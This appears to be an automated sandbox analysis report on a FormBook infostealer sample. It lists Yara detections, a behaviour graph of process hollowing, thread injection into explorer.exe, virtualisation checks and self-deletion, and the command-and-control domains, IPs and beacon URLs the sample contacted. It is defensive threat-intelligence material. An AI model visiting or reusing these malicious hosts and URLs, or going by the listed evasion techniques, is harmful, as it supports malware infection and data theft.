Source: Yara match File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562034 Sample: 5tCYPTkM6b.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 31 www.postmoon.xyz 2->31 33 www.nbjcgl.com 2->33 35 5 other IPs or domains 2->35 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 5 other signatures 2->49 11 5tCYPTkM6b.exe 19 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\npsx.dll, PE32 11->29 dropped 63 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->63 65 Tries to detect virtualization through RDTSC time measurements 11->65 67 Injects a PE file into a foreign processes 11->67 15 5tCYPTkM6b.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.yixuan5.com 156.246.248.162, 49820, 80 Africa-on-Cloud-ASZA Seychelles 18->37 39 gooooooo.xyz 148.72.244.75, 49815, 80 AS-26496-GO-DADDY-COM-LLCUS United States 18->39 41 6 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 control.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
148.72.244.75
 gooooooo.xyz United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
34.102.136.180
 carriewilliamsinc.com United States
15169 GOOGLEUS false
156.246.248.162
 www.yixuan5.com Seychelles
328608 Africa-on-Cloud-ASZA true

Contacted Domains

Name IP Active
www.yixuan5.com 156.246.248.162 true
www.micorgas.com 35.186.238.101 true
carriewilliamsinc.com 34.102.136.180 true
gooooooo.xyz 148.72.244.75 true
www.wildberryhair.com 172.67.168.28 true
farmacymerchants.com 34.102.136.180 true
freelance-rse.com 193.141.3.66 true
www.gooooooo.xyz unknown unknown
www.freelance-rse.com unknown unknown
www.carriewilliamsinc.com unknown unknown
www.nbjcgl.com unknown unknown
www.inslidr.com unknown unknown
www.postmoon.xyz unknown unknown
www.ehaszthecarpetbagger.com unknown unknown
www.farmacymerchants.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 true
  • Avira URL Cloud: malware
 unknown
http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 false
  • Avira URL Cloud: malware
 unknown
www.dreamschools.online/b80i/ true
  • Avira URL Cloud: phishing
 low
http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 false
  • Avira URL Cloud: malware
 unknown
http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 true
  • Avira URL Cloud: phishing
 unknown